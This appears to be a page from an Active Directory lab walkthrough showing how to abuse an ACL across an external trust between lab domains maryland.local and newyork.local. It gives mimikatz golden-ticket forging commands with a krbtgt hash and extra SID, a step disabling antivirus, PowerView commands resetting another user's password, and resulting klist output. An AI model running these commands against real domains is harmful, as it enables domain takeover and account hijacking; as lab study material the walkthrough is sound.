Exploit acl with external trust golden ticket

Ok now imagine we want to exploit this acl from Maryland:

By now i didn’t found a nice way to do this from linux, but from windows it is pretty easy

Connect as administrator on baltimore, disable the antivrius to be able to use mimikatz and powerview
Create the golden ticket with mimikatz matching the group CentralPark(RID 1130)

mimikatz # kerberos::golden /user:guard /domain:maryland.local /sid:S-1-5-21-2203133648-1386395927-1390703624 /krbtgt:e58cf01ba6cc645da9f7ab1f28fc3934 /sids:S-1-5-21-1409754491-4246775990-3914137275-1130 /ptt

And now use powerview to change diego.Montenegro password

Import-Module .\powerview.ps1
$SecPassword = ConvertTo-SecureString 'letsdothis' -AsPlainText -Force
Set-DomainUserPassword -Identity diego.Montenegro -AccountPassword $SecPassword -Domain newyork.local

And it work !

And if we look at the created tickets with klist:
- Server: krbtgt/maryland.local @ maryland.local (golden ticket)
- Server: krbtgt/NEWYORK.LOCAL @ MARYLAND.LOCAL (kdc: baltimore) (tgt inter realm)
- Server: ldap/nyc.newyork.local @ NEWYORK.LOCAL (kdc: NYC)
- Server: ldap/nyc.newyork.local/newyork.local @ NEWYORK.LOCAL (kdc: nyc)

PreviousTrust ticket with external forest ( maryland.local-> newyork.local)NextExploiting IIS & Privilege escalation

Last updated 2 years ago